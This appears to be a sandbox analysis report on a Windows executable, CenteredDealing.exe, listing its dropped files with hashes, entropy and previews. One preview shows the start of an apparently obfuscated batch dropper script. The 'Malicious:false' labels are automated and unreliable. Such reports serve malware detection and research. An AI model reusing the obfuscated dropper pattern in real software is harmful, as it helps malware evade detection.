                                                                                                                                                                                                                                                              SHA1:6B33526BB5B94C3C4EECABC29D7C1F40B7FA9DDC
                                                                                                                                                                                                                                                              SHA-256:234300327371128DFD76E98E88541454F4096A13E0842040DD5EE1E54751E08F
                                                                                                                                                                                                                                                              SHA-512:BBF0E9A37F44CB28775D23596C1FC3FC8F444F1A6DB5870EA9032D7A81EED35D5D64A5975A482BECD395C97F9A5858B938C9D9CEE36AC6C6ECC8B20DFB6E8EDD
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):41082
                                                                                                                                                                                                                                                              Entropy (8bit):7.995413809966018
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:768:QwYmFVfR2eWGswfhOePq49Cgrrc6pYz1DiTYYOohMpqOUkEv+UqMM2MyUo4YeUe0:omKLGszoCgvc6I1mtHCqhmUqMxMv4y0
                                                                                                                                                                                                                                                              MD5:533D273F6E9D5144002D5813BE09E75A
                                                                                                                                                                                                                                                              SHA1:F1DC3D824FF9F8E5B4C21E4AEE2F16C993F224ED
                                                                                                                                                                                                                                                              SHA-256:4C98B3C4623405FAA581A40CC69A64049E560A11F8FD31CE71574DC6CA290E4D
                                                                                                                                                                                                                                                              SHA-512:0E57356E602AE94237150BF055FCC38C2348DA3A7D6066C18781F2B2D67829FCDE50421EC7859727EA9220165DF74A8EABE70AE2EFAF6BC1A9D6BE867BB36A86
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):75776
                                                                                                                                                                                                                                                              Entropy (8bit):7.997546591172146
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:GA0SJ81KWm81gCWtkMwOLtIKZWmGbqAp6B0uy5lilUG0+rO:GA0SJ81KWNWtkK1Oi0uyfi70+rO
                                                                                                                                                                                                                                                              MD5:7732CC46245FF0F7644C028387E61C09
                                                                                                                                                                                                                                                              SHA1:CBEA8C2AFB8372988C9FE18C37807272CC2C652D
                                                                                                                                                                                                                                                              SHA-256:A4EBEA30DCA4B46E7E1FCFC501BC57EB877481030C8F70B6909DAA730C82BCB6
                                                                                                                                                                                                                                                              SHA-512:E039A9CCA8E8714FA20C992BED3C1C92EDC5229C8C5B707F0F1AFA642CDB6FC673EF1C504D5E185902F08E249D7D761EDED923861E0ABE6F8115AF973C172FC4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):67584
                                                                                                                                                                                                                                                              Entropy (8bit):7.997123400285193
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:PvnUlZkl+gOhnV5YuAdG41NE8Pf/KmP5EQvJIlUhLoU:PPU3sQjENtf/DhRvJVhLj
                                                                                                                                                                                                                                                              MD5:5DD8FBA745B2A84306EB496FC06C092C
                                                                                                                                                                                                                                                              SHA1:CAF86029DAD7519777275889DCCB088D079549C5
                                                                                                                                                                                                                                                              SHA-256:A8E7082C762A9E12679CE118E6761C73E8B5E4B906CBA31E08D5202564334237
                                                                                                                                                                                                                                                              SHA-512:55F05F9026EACDB661B5F124D216BB09C414926831E98796411A9B375D304F1CC3E5B2F2A58D1E57721C7C485912D2E1B8A67B1CCCD2EB65AC0F606A46AC0D85
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):52224
                                                                                                                                                                                                                                                              Entropy (8bit):6.661798077918334
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:xxWboHdMJ3RraSXL21rKoUn9r5C03Eq3x:xxrHSBRtNPnj0e
                                                                                                                                                                                                                                                              MD5:7D508AB8CE0CA9FE86E8FB90DF4E656F
                                                                                                                                                                                                                                                              SHA1:E1C5F7E6CEE9167B3C3784C52FBAE0D9E6191C1C
                                                                                                                                                                                                                                                              SHA-256:D98DB59F88B112A640A2437413713065FA11887EC35A71D4862A1498428BC5FB
                                                                                                                                                                                                                                                              SHA-512:C1828564A6C7542EFA62884265ED8B4F94F23BB5D5E1D58240495C99FF218703FD7C5E20ECFE5492022A5E7A38C9E3DE04520DFD85675FF4CE1460AA056E2F15
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                                                              Entropy (8bit):6.35103906772587
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:hg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf1:S5vPeDkjGgQaE/loUDtf1
                                                                                                                                                                                                                                                              MD5:F01E782AE3C874A37D961CACBD4E275D
                                                                                                                                                                                                                                                              SHA1:E82119C16215743533DFFA4B019D678AF80709C9
                                                                                                                                                                                                                                                              SHA-256:3A9D5DE865B3736307BE9DB7C5E8D915B49BE7E9133C1F59D7B2BB64E29A0A71
                                                                                                                                                                                                                                                              SHA-512:ABB59CFACDD4BF02B6B87608AF084D8DFA1310659CC2EB4CE3AEC25F3F1DDD566DEC27A44A32FA3A25B448704C1CCD2AD4D53289FF8E41781068DCC2801EDE1E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):74752
                                                                                                                                                                                                                                                              Entropy (8bit):6.670224845607931
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:GBcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYmJ:4EoXnmowS2u5hVOoQ7t8T6pUkBJR8CTJ
                                                                                                                                                                                                                                                              MD5:F6C613F0BFB3B0C58BDA17E905A3CEDB
                                                                                                                                                                                                                                                              SHA1:1DE6513E41234CBFDB77F7B7034197F6051A4892
                                                                                                                                                                                                                                                              SHA-256:C8EEA7B5623E04CE383A4769EB5C2D0AD61E1969EC723B56BEAC29D1CA89E99D
                                                                                                                                                                                                                                                              SHA-512:0250E83B571D04ED1A84D50BBC103DFC228C6B942A6B31D87658FE864662DF96E576B27889BC942EED348E81F48CE6D3047DBFE25BDAD93D77A186B94C6B85F3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):88064
                                                                                                                                                                                                                                                              Entropy (8bit):6.586659174144973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:bGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwh:hPtCZEMnVIPPBxT/sZydTmRxlHS3j
                                                                                                                                                                                                                                                              MD5:5E6F0A508954223D320C20C3DC6EBFEE
                                                                                                                                                                                                                                                              SHA1:6723A377134D7932EE1E036393C96110B81C2304
                                                                                                                                                                                                                                                              SHA-256:918959362F31FFD1B193AF2891C29246BA18C6FB88D23DFAF6D3B7E831E6AFE2
                                                                                                                                                                                                                                                              SHA-512:B36B0F06276CA0C653B823255FB14B8884393E4BBB0B4387E778F1FA1063F13014AEB974CD282701A0E43A194B251413F7A367E483BCC5CCADD1FA0BAA045D14
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):59392
                                                                                                                                                                                                                                                              Entropy (8bit):5.828670342048589
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:D6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWD:D6u640ewy4Za9coRC2jfTq8Q9
                                                                                                                                                                                                                                                              MD5:979152C6C3F75046A91CD8A96458E7BD
                                                                                                                                                                                                                                                              SHA1:255CBF750792BCA6D563BD13B1F2222D65E7CCD6
                                                                                                                                                                                                                                                              SHA-256:D80ADC900E1BC208DE694FBA009800918145C79E57A5C3421AA006CFBE7FEA03
                                                                                                                                                                                                                                                              SHA-512:313A6D61C71C438160372AC200EF3D8F6D9338E96115BAC1E9103C5A09D92D5394435495D1147B1DF5720E7F2F7858AD38BAD4F901C657553788D33DB71AD079
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8665
                                                                                                                                                                                                                                                              Entropy (8bit):5.169016611437142
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:eJiwx1mmlzr2Dw6tLO+ZTgZlQ1ium+PFOshoIkBGR2As6vXYJy2Fq5D9ZRLwKFMM:Xwxkqr2npZTgZlQPFJN5s6v0yV2KFQVI
                                                                                                                                                                                                                                                              MD5:2D9D73D3DE18302F486606200FCC930B
                                                                                                                                                                                                                                                              SHA1:5DC9EBBF5A05C136543EB1F6F257E014C8C096FC
                                                                                                                                                                                                                                                              SHA-256:375342F340E7AF8561966BC5D796983E701F57BC593BF206F0829FC3B5C38273
                                                                                                                                                                                                                                                              SHA-512:9CFC78BF30EFAD89992F798F256EB2D0C9DF7C951EB001E873CCA74C1589C574F774BDD59C150A65D4248761294E0E99427354A7F3EB29EF8A785E6F6A0883DA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Whom=h..ZbpTo-Enhanced-Recognized-Expert-Bean-Stories-..SVCHarassment-Ivory-Executed-Sb-Replies-Taxi-Measurement-Supports-..lItGg-Valid-Term-Stands-Estates-Wayne-..RLCaused-Its-Character-Participate-Retro-Builds-Alan-..mdYSurgeons-Factor-Recruiting-Webmasters-Placed-..ELzCreate-Cell-Usc-..YJVegetables-Honda-Agency-Positive-Rain-..dFSecurities-Reply-Img-..oNFRMens-..Set Appear=9..NIxGba-Est-Belts-Database-Penalties-Expects-Ruth-Villa-..FepCheckout-..JSrAffect-Manga-Detection-Chronicles-Automatic-Annotation-Personal-..lJCVMs-Latina-Freeze-Jul-Cams-..sOGZCarrier-Performs-..qDZPrepaid-Prix-Tooth-German-Establish-..Set Specifics=v..fRVoyeur-Suites-..wVexContinuously-Fly-Arms-Align-..bAjjRays-Neighbor-Personal-Antarctica-Tire-..IkClay-Pal-Supplies-Nicole-Stage-Compromise-Swimming-Incoming-Advantages-..TkokUtility-Valve-Ultram-Driven-Tomorrow-Excerpt-..Set Automated=j..GzvApplication-..PoPoland-..IcParagraphs-Diana-Serbia-Tagged-Owners-Used-Kidney-Religion-Lt-..uoZjCharm-Controversy-Remix
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8665
                                                                                                                                                                                                                                                              Entropy (8bit):5.169016611437142
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:eJiwx1mmlzr2Dw6tLO+ZTgZlQ1ium+PFOshoIkBGR2As6vXYJy2Fq5D9ZRLwKFMM:Xwxkqr2npZTgZlQPFJN5s6v0yV2KFQVI
                                                                                                                                                                                                                                                              MD5:2D9D73D3DE18302F486606200FCC930B
                                                                                                                                                                                                                                                              SHA1:5DC9EBBF5A05C136543EB1F6F257E014C8C096FC
                                                                                                                                                                                                                                                              SHA-256:375342F340E7AF8561966BC5D796983E701F57BC593BF206F0829FC3B5C38273
                                                                                                                                                                                                                                                              SHA-512:9CFC78BF30EFAD89992F798F256EB2D0C9DF7C951EB001E873CCA74C1589C574F774BDD59C150A65D4248761294E0E99427354A7F3EB29EF8A785E6F6A0883DA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Whom=h..ZbpTo-Enhanced-Recognized-Expert-Bean-Stories-..SVCHarassment-Ivory-Executed-Sb-Replies-Taxi-Measurement-Supports-..lItGg-Valid-Term-Stands-Estates-Wayne-..RLCaused-Its-Character-Participate-Retro-Builds-Alan-..mdYSurgeons-Factor-Recruiting-Webmasters-Placed-..ELzCreate-Cell-Usc-..YJVegetables-Honda-Agency-Positive-Rain-..dFSecurities-Reply-Img-..oNFRMens-..Set Appear=9..NIxGba-Est-Belts-Database-Penalties-Expects-Ruth-Villa-..FepCheckout-..JSrAffect-Manga-Detection-Chronicles-Automatic-Annotation-Personal-..lJCVMs-Latina-Freeze-Jul-Cams-..sOGZCarrier-Performs-..qDZPrepaid-Prix-Tooth-German-Establish-..Set Specifics=v..fRVoyeur-Suites-..wVexContinuously-Fly-Arms-Align-..bAjjRays-Neighbor-Personal-Antarctica-Tire-..IkClay-Pal-Supplies-Nicole-Stage-Compromise-Swimming-Incoming-Advantages-..TkokUtility-Valve-Ultram-Driven-Tomorrow-Excerpt-..Set Automated=j..GzvApplication-..PoPoland-..IcParagraphs-Diana-Serbia-Tagged-Owners-Used-Kidney-Religion-Lt-..uoZjCharm-Controversy-Remix
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):62464
                                                                                                                                                                                                                                                              Entropy (8bit):6.0205593496694645
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:Acd0vtmgMbFuz08QuklMBNIimuzaAwusk:heAg0Fuz08XvBNbjaAtsk
                                                                                                                                                                                                                                                              MD5:5F40468878ED32692F7CFB615F905B03
                                                                                                                                                                                                                                                              SHA1:74C1FE8E6612B1B775FC28FA7E0FA0487996BCCF
                                                                                                                                                                                                                                                              SHA-256:55FB1FB9E690370BF2652A453C8A229B8DD812B64E78C18840B302FA79222009
                                                                                                                                                                                                                                                              SHA-512:1629509F7A56E3BAA21BC4FA8F8D1884703FA897632BB1A4652BC725566D3309E88A4B7EC9D34DCD1D39FCA2F08BCA12F1780AF317380837480E348B1E346A69
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):68608
                                                                                                                                                                                                                                                              Entropy (8bit):7.997404908491138
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:n6PJG4PTW5bmpzlGIM4Woo2j3qW3Qgb4pL9Jd+96aUVUiLSP/5Fi:nUJP6lIlGN4Tgg0pLbd+9rUVUi2PW
                                                                                                                                                                                                                                                              MD5:63C01C6583C814079EFC34F9F2E7768E
                                                                                                                                                                                                                                                              SHA1:F13EF6330D780524903FD229D4F8D3E43AB2FDDA
                                                                                                                                                                                                                                                              SHA-256:76EEF7A207D472148A334A431BA20A8818D92457BB658E990E9B32CDF6489E0B
                                                                                                                                                                                                                                                              SHA-512:4E9D93822994F97D370FE93A23845B864041F0A2AE5675376898A4F0F87C7AA4A316CCD9ECCF1184EF67D09495A36C1263A54DADFF7482D51EFCF49ACEFD5EBF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):82944
                                                                                                                                                                                                                                                              Entropy (8bit):7.997588151658238
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:9XuiAOhllOqx+GFt4A4pIhr9W4qHJNm+18j77Xx0qSak0Iq+0x:ciAO/lTUGD4A2IFo4+zm+1OO3v0XFx
                                                                                                                                                                                                                                                              MD5:C14496DA77D543FC678FA04A1E9AD51A
                                                                                                                                                                                                                                                              SHA1:99D654B892E2DE0184E5C007B48B764744DE7C76
                                                                                                                                                                                                                                                              SHA-256:D3A8D87393D6B38FA435FB90BFB3D31B4E4103D52D19855FC883BA594A093BCC
                                                                                                                                                                                                                                                              SHA-512:B21500A88761C2C9E7A9E932AD8DBC50E1DB65D40E8AFBFF4BAEAC1A6709811A1BE49FBF0EEF6AD8DF085B1955B77AEC04F041BD7252550D96480F95DD803DBA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (825)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):830
                                                                                                                                                                                                                                                              Entropy (8bit):5.190025959744097
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:SGMMtcIOe/tmTCOGBHslgT9lCuABAT/WdquoB7HHHHHHHYqmffffffo:ZMLIOe/tmOFKlgZ01BAruSEqmffffffo
                                                                                                                                                                                                                                                              MD5:D8C0313331A218B5EA8AA99BD0A84904
                                                                                                                                                                                                                                                              SHA1:B6CDCCA9619BA53006A25A04EF93D0DF0B82E92C
                                                                                                                                                                                                                                                              SHA-256:353A8DA037F0FE8CBB25431A2EB1F460035181FAE1DBF1B0B0C6550D0EB26E07
                                                                                                                                                                                                                                                              SHA-512:73CEF967EEFB5973985FF09E65E324B2E926CFC167375655FE00F293D69900040768B07222512E29992D6B5AB83C8E87C0B35D8B024E11E3EC0B2F1E25396A87
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                              Preview:)]}'.["",["norwegian cruise ship man overboard","vexbolts tiktok live follower count","polar vortex weather forecast","ripple xrp","buffalo bills patriots","spacex rocket launch today","samsung galaxy s25 ultra camera leak","peach drop"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":4059414775353948137,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):117446
                                                                                                                                                                                                                                                              Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                              MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                              SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                              SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                              SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):132739
                                                                                                                                                                                                                                                              Entropy (8bit):5.436712439712313
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:f5kJQ7O4N5dTm+syHEt4W3XdQ4Q6SuSr/nUW2i6o:fwQ7HTt/sHdQ4Q6SDfUW8o
                                                                                                                                                                                                                                                              MD5:04DCAB9CC34C4B26F7E98622DCDEA806
                                                                                                                                                                                                                                                              SHA1:8FE44607E3C73E2F3CFABBAF943C524AF7D9F019
                                                                                                                                                                                                                                                              SHA-256:C74065A2A94D975A4DAA0224959E92C02B55EB39E258F7E9482CF6092F2D96DA
                                                                                                                                                                                                                                                              SHA-512:F1C01423B686AD80433053E2BEB43B2FAB09DDE169F9E8316E82A3201A270487F6DDEB897E79B13CA43E72023C7E6B02B146F1435483968C23B79D998AE8347F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):175897
                                                                                                                                                                                                                                                              Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                              MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                              SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                              SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                              SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):5162
                                                                                                                                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.958215914632877
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:CenteredDealing.exe
                                                                                                                                                                                                                                                              File size:1'203'969 bytes
                                                                                                                                                                                                                                                              MD5:228e734f246564bb255b68d51bd6d31e
                                                                                                                                                                                                                                                              SHA1:13a36ae7bd290f4d7aba808d4435eb04008d3ac8
                                                                                                                                                                                                                                                              SHA256:7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
                                                                                                                                                                                                                                                              SHA512:bab72f4df67275da22a5fdfbf43eb55140dd6a68a025c263d12d30df8509b0d54c5b5388e8c49abeb0295c5fb5c8dae20f087f6230a6e214877765fef4e1c8b9
